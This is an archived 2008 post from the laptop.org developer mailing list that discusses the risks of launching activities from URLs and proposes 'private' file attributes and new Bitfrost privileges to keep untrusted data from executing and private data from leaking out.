Security for launching from URL
Jameson "Chema" Quinn
jquinn at cs.oberlin.edu
Sat Jul 5 09:27:41 EDT 2008
On Fri, Jul 4, 2008 at 4:42 PM, Ivan Krstić <
krstic at solarsail.hcs.harvard.edu> wrote:
> On Jul 4, 2008, at 1:37 PM, Edward Cherlin wrote:
> > My guess is that there is a way to secure the
> > process, but it might require some extra effort beyond a software fix,
> > like teachers whitelisting URLs for lessons. Or perhaps just
> > whitelisting our Moodle instances. Signed lesson plans? At any rate,
> > _not_ allowing random outside URLs to launch local activities and give
> > them scripts to run.
>
> Mainstream desktop OSes allow installed applications to register
> themselves as handlers for particular URI schemes. The applications
> are called when a URI under their handled scheme is invoked (such as
> by clicking within a browser), and are passed the entirety of the
> invoking URI, but no other information.
>
> Assuming the invoked application treats the URI with no additional
> trust, just as if it were entered from within the application, there
> is no inherent security vulnerability to speak of. Issues would arise,
> for example, if the application had a code path that performed
> filtering or applied other restrictions to the URIs it used, but
> failed to invoke that code path when an URI was passed from the OS
> rather than being entered from within the application.
>
> That said, the URI handler approach should be used sparingly. It's one
> thing to allow starting an audio player by clicking an MP3 link in the
> browser, and another to arbitrarily execute code (e.g. through an
> execution environment such as Pippy or eToys) from a web page with a
> single click. While Bitfrost is designed to mitigate the side effects
> of arbitrary code execution, it's very unwise to make it trivial for
> the user to trigger such execution unknowingly.
>
> --
> Ivan Krstić <krstic at solarsail.hcs.harvard.edu> | http://radian.org
>
> _______________________________________________
> Devel mailing list
> Devel at lists.laptop.org
> http://lists.laptop.org/listinfo/devel
>
I do not think that URI's pointing to the local machine are what is needed
here. What about simply downloading/opening files? I click on a link, it
downloads the file, when the download is complete I get an alert asking me
if I want to see it in the journal, I say yes, I am taken to the journal
where I open it. Later, a UI improvement lets me open it directly from the
(trusted) alert (although this means running the alert from a non-activity
context, and may put impossible burdens on our nonexistent X security).
Security-wise, how is this different from the URI-based scheme? Only in that
it does not require the activity to be pre-registered to accept URIs.
There are two security holes to worry about here - incoming data that is
executed without sufficient Bitfrost protection, and outgoing private data -
that is, data that comes from an activity without P_NETWORK (which is, of
course, unimplemented right now, but still worth worrying about) and gets
handed to an activity with P_NETWORK. One at a time:
1. Incoming data. Imagine a future version of Terminal that saves its
history files in the journal and then allows opening with a given history
and using the up arrow to rerun commands. Terminal has no Bitfrost
protection, and so should absolutely refuse to open nonlocal histories. (In
the URI scheme, this just means not registering Terminal as a URI handler.
However, it is not clear how the URI handler registry interacts with
bitfrost. I think my solution below is better.)
2. Outgoing data. Imagine EvilSpyGame which does voice recognition for the
name of the illegal opposition party, then encodes this info into an
innocuous-looking URL. When you click on the URL, your Browse rats you out
to the secret police. (The obvious limitation here is the small amount of
data which fits into a URL, but that limitation is not part of Bitfrost and
so cannot be trusted - I remember the "upskirt security professional" who
came trolling #olpc a while back, if photos could be leaked there is a real
danger.)
One scheme which would deal with both of these issues is a "private"
metadata attribute on files. Say there were three new bitfrost privileges,
P_OPEN_PRIVATE, P_OPEN_NONPRIVATE, and P_SAVE_NONPRIVATE (in actual
implementation, some of these privileges might be inferred from existing
privileges.) P_OPEN_PRIVATE would be incompatible with P_NETWORK (except
through user intervention); P_SAVE_NONPRIVATE would be incompatible with
P_MIC_CAM; and P_OPEN_NONPRIVATE would be available to all activities, but
activities which give excessive code-execution power to "data" (eg, my
hypothetical future Terminal, above) could refuse this privilege at will.
This scheme, at a first approximation, resolves the two issues I mentioned.
However, the UI for setting the private attribute on a file becomes
important. If it is too easy to change the private attribute without
realizing the consequences, my scheme becomes useless; yet trying to
handcuff the user, or presenting "Are you sure you want to do that dangerous
thing?" dialogs, may not be acceptable solutions either.
Jameson
ps.
The "private" attribute would obviously have consequences for encryption,
too. It might have three values - "private", "normal", and "published".
"private" and "normal" would be encrypted on backup; "published" would be
world-browseable on the school server. But this is a separate issue.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.laptop.org/pipermail/devel/attachments/20080705/dabfe1d5/attachment.html>
More information about the Devel
mailing list